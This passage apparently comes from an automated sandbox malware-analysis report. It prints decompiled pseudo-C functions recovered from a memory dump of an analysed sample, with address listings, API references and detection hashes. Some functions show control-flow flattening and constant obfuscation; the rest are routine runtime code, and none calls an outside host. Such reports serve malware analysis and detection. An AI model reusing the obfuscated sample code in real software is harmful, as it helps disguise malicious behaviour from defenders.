                                          Function 006D7A0F, Relevance: .1, Instructions: 66COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D7A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E006D7F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E006CD64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}














                                          0x006d7a0f
                                          0x006d7a15
                                          0x006d7a21
                                          0x006d7a28
                                          0x006d7a2f
                                          0x006d7a36
                                          0x006d7a3d
                                          0x006d7a44
                                          0x006d7a48
                                          0x006d7a4f
                                          0x006d7a56
                                          0x006d7a5a
                                          0x006d7a61
                                          0x006d7a68
                                          0x006d7a6c
                                          0x006d7a73
                                          0x006d7a7a
                                          0x006d7a7e
                                          0x006d7a86
                                          0x006d7a92
                                          0x006d7a99
                                          0x006d7aa3
                                          0x006d7aa5
                                          0x006d7aac
                                          0x006d7aae
                                          0x006d7aae
                                          0x006d7ab4
                                          0x006d7ae3
                                          0x006d7ae4
                                          0x006d7ae9
                                          0x006d7aec
                                          0x006d7aee
                                          0x00000000
                                          0x006d7ab6
                                          0x006d7ab8
                                          0x00000000
                                          0x006d7aba
                                          0x006d7ad2
                                          0x006d7ad2
                                          0x006d7ab8
                                          0x006d7ad5
                                          0x006d7adc
                                          0x006d7adc
                                          0x006d7af2
                                          0x006d7af4
                                          0x006d7af4
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                          • Instruction ID: 501425992d642b1e32190463288405c25e5294911723ee6015d208ddee99b2d9
                                          • Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                          • Instruction Fuzzy Hash: 5D217AB1E04219ABDB54DBA4D88A4AFFBB1FB50308F68806AD505B3341E3B54B44CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D687F, Relevance: .1, Instructions: 60COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006D687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E006D674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}













                                          0x006d6885
                                          0x006d688c
                                          0x006d6893
                                          0x006d6897
                                          0x006d689b
                                          0x006d68a2
                                          0x006d68a9
                                          0x006d68b0
                                          0x006d68be
                                          0x006d68c5
                                          0x006d68c8
                                          0x006d68cf
                                          0x006d68da
                                          0x006d68e0
                                          0x006d68e7
                                          0x006d68ee
                                          0x006d68f5
                                          0x006d68f9
                                          0x006d6900
                                          0x006d6907
                                          0x006d690e
                                          0x006d6915
                                          0x006d691c
                                          0x006d6923
                                          0x006d692a
                                          0x006d692e
                                          0x006d6950
                                          0x006d695a
                                          0x006d6964

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                          • Instruction ID: f51facf4caf8613b81d556fb690fe4122f72bbbf4b6852e77436e7ff642798ca
                                          • Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                          • Instruction Fuzzy Hash: 9321E3B2D0021EABDB15CFE1C94A9EEBBB5FB14204F108299D521B6160D3B85B55CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CC4FF, Relevance: .0, Instructions: 2COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006CC4FF() {

				return  *[fs:0x30];
			}



                                          0x006cc505

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}












                                          0x10007337
                                          0x1000733f
                                          0x10007345
                                          0x1000734b
                                          0x1000734f
                                          0x10007351
                                          0x10007358
                                          0x1000735e
                                          0x10007361
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10007361
                                          0x10007363
                                          0x10007363
                                          0x10007369
                                          0x1000736b
                                          0x10007370
                                          0x10007379
                                          0x10007381
                                          0x10007383
                                          0x10007389
                                          0x1000738f
                                          0x10007392
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10007392
                                          0x10007394
                                          0x10007394
                                          0x1000739b
                                          0x100073a6
                                          0x100073ac
                                          0x100073b7
                                          0x100073bf
                                          0x100073c5
                                          0x100073ce
                                          0x100073d1
                                          0x100073d6
                                          0x100073d8
                                          0x100073de
                                          0x100073e3
                                          0x100073ea
                                          0x100073ed
                                          0x100073f3
                                          0x100073f3
                                          0x100073f9
                                          0x10007400
                                          0x10007403
                                          0x10007409
                                          0x10007409
                                          0x10007415
                                          0x1000741e
                                          0x10007420
                                          0x1000742c
                                          0x1000742f
                                          0x10007435
                                          0x00000000
                                          0x10007435
                                          0x1000742c
                                          0x1000743d

                                          APIs
                                          • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                          • _free.LIBCMT ref: 10007358
                                            • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                            • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                          • _free.LIBCMT ref: 1000736B
                                          • _free.LIBCMT ref: 10007389
                                          • _free.LIBCMT ref: 1000739B
                                          • _free.LIBCMT ref: 100073AC
                                          • _free.LIBCMT ref: 100073B7
                                          • _free.LIBCMT ref: 100073D1
                                          • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                          • _free.LIBCMT ref: 100073ED
                                          • _free.LIBCMT ref: 10007403
                                          • InterlockedDecrement.KERNEL32 ref: 10007415
                                          • _free.LIBCMT ref: 1000742F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                          • String ID:
                                          • API String ID: 4264854383-0
                                          • Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                          • Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
                                          • Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                          • Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 55%
                                          			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0x8bc2c1c1
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}
















































                                          0x10002f79
                                          0x10002f80
                                          0x10002f85
                                          0x10002f89
                                          0x10002f9a
                                          0x10002f9c
                                          0x10002fa4
                                          0x10002fb1
                                          0x10002fb9
                                          0x10003285
                                          0x10003295
                                          0x10002fd7
                                          0x10002fd7
                                          0x10002fda
                                          0x10002fe0
                                          0x10002fee
                                          0x10002ff6
                                          0x10003272
                                          0x10003277
                                          0x1000327d
                                          0x00000000
                                          0x10003283
                                          0x10002ffc
                                          0x10003002
                                          0x10003009
                                          0x10003017
                                          0x1000301d
                                          0x10003023
                                          0x10003027
                                          0x1000307e
                                          0x1000307e
                                          0x10003264
                                          0x10003264
                                          0x1000326d
                                          0x00000000
                                          0x1000326d
                                          0x1000309c
                                          0x100030a1
                                          0x100030a8
                                          0x10003258
                                          0x10003258
                                          0x10003261
                                          0x00000000
                                          0x10003261
                                          0x100030b2
                                          0x100030bc
                                          0x100031fe
                                          0x1000320d
                                          0x10003215
                                          0x1000321b
                                          0x1000321f
                                          0x00000000
                                          0x00000000
                                          0x10003221
                                          0x10003227
                                          0x10003237
                                          0x1000323a
                                          0x1000323e
                                          0x1000324c
                                          0x1000324c
                                          0x10003255
                                          0x00000000
                                          0x10003255
                                          0x10003240
                                          0x10003240
                                          0x10003249
                                          0x00000000
                                          0x10003249
                                          0x100030dd
                                          0x100030e2
                                          0x100030e6
                                          0x00000000
                                          0x00000000
                                          0x100030ec
                                          0x100030f2
                                          0x100030f9
                                          0x1000310b
                                          0x1000310d
                                          0x10003111
                                          0x00000000
                                          0x00000000
                                          0x1000311e
                                          0x10003128
                                          0x10003130
                                          0x10003138
                                          0x1000313d
                                          0x10003144
                                          0x10003157
                                          0x1000315a
                                          0x10003162
                                          0x1000316a
                                          0x1000316f
                                          0x10003175
                                          0x1000317c
                                          0x1000317e
                                          0x10003184
                                          0x1000318c
                                          0x10003198
                                          0x1000319c
                                          0x100031a5
                                          0x100031aa
                                          0x100031b0
                                          0x100031b4
                                          0x100031b6
                                          0x100031bc
                                          0x100031c4
                                          0x100031d0
                                          0x100031d4
                                          0x100031dd
                                          0x100031e8
                                          0x100031e8
                                          0x100031f1
                                          0x100031f1
                                          0x100031fa
                                          0x100031fa
                                          0x00000000
                                          0x10003144
                                          0x10003029
                                          0x1000302c
                                          0x10003033
                                          0x10003045
                                          0x1000304b
                                          0x1000304f
                                          0x00000000
                                          0x00000000
                                          0x10003055
                                          0x1000305b
                                          0x1000306b
                                          0x1000306e
                                          0x10003070
                                          0x10003079
                                          0x1000307c
                                          0x00000000
                                          0x1000307c

                                          APIs
                                          • _memset.LIBCMT ref: 10002F9C
                                          • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                            • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                            • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                            • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                            • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                            • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                            • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                          • VariantClear.OLEAUT32(?), ref: 100031F1
                                          • VariantClear.OLEAUT32(?), ref: 100031FA
                                          • CoTaskMemFree.OLE32(?), ref: 1000327D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                          • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                          • API String ID: 2822920939-4160240301
                                          • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                          • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                          • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                          • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}




























                                          0x10007719
                                          0x1000771b
                                          0x10007720
                                          0x10007727
                                          0x1000772d
                                          0x1000772f
                                          0x10007738
                                          0x10007758
                                          0x1000775c
                                          0x1000775d
                                          0x1000775e
                                          0x10007765
                                          0x10007767
                                          0x1000776c
                                          0x10007785
                                          0x1000778a
                                          0x10007790
                                          0x10007799
                                          0x1000779f
                                          0x100077a2
                                          0x100077a5
